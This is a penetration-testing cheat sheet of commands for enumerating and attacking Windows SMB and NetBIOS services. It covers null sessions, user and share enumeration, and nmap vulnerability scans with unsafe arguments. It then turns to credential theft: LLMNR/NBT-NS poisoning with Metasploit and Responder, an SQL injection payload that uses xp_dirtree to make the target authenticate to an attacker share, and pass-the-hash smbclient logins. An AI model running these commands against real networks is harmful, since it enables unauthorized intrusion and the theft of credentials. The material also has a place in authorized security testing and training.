--------------- nbtscan ----------------
nbtscan <[SUBNET]>

--------------- enum4linux ----------------
enum4linux -a <TARGET IP>

--------------- Null Session ----------------
Linux
     # smbclient -L <[IP]> -N
     # smbclient \\<[IP]>\share -N
Windows
     # net use \\\\$ip\\IPC$ "" /u:""
Ridenum.py
     # ridenum.py $ip 500 50000 dict.txt
Metasploit
     # use auxiliary/scanner/smb/smb\_lookupsid

--------------- Enumerate SMB Users ---------------
# nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14
# python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip

--------------- NMAP ----------------
NMap Enumeration Script List:

Nmap port version detection MAXIMUM power
     # nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p &lt;port&gt; &lt;host&gt;

Vulnerable Scripts
     # nmap -p139,445 --script=smb-vuln-* --script-args=unsafe=1 <[SUBNET]>
     # nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14

SMB OS Discovery
     # nmap $ip --script smb-os-discovery.nse

Nmap port scan
     # nmap -v -p 139,445 -oG smb.txt $ip-254

Netbios Information Scanning
     # nbtscan -r $ip/24

Nmap find exposed Netbios servers
     # nmap -sU --script nbstat.nse -p 137 $ip

SMB Enumeration Tools
     # nmblookup -A $ip smbclient //MOUNT/share -I $ip -N rpcclient -U "" $ip enum4linux $ip enum4linux -a $ip

SMB Finger Printing
     # smbclient -L //$ip

Nmap Scan for Open SMB Shares
     # nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 $ip/24

Nmap scans for vulnerable SMB Servers
     # nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip

Nmap List all SMB scripts installed
     # ls -l /usr/share/nmap/scripts/smb\*
     
--------------- LLMNR / NBT-NS Spoofing - Steal credentials off the network. ---------------
Spoof / poison LLMNR / NetBIOS requests:
     # auxiliary/spoof/llmnr/llmnr_response
     # auxiliary/spoof/nbns/nbns_response

Capture the hashes:
     # auxiliary/server/capture/smb
     # auxiliary/server/capture/http_ntlm

Using Responder to Steal Creds
     # git clone https://github.com/SpiderLabs/Responder.git 
     # python Responder.py -i local-ip -I eth0
     
Useing impacket to steal NTML hashes - similar to sql injection look for =# at the end of the url.
# impacket-smbserver hack $(pwd)
http://<IP ADDRESS>/page.aspx?somethingid=15; use master; exec xp_dirtree '\\<LHOST>\<SHARE>';--


--------------- Pass the Hash ---------------
smbclient –L \\\\<IP ADDRESS>\\ -U username%<hash> --pw-nt-hash
smbclient \\\\<IP ADDRESS>\\<SHARE> -U username%<hash> --pw-nt-hash

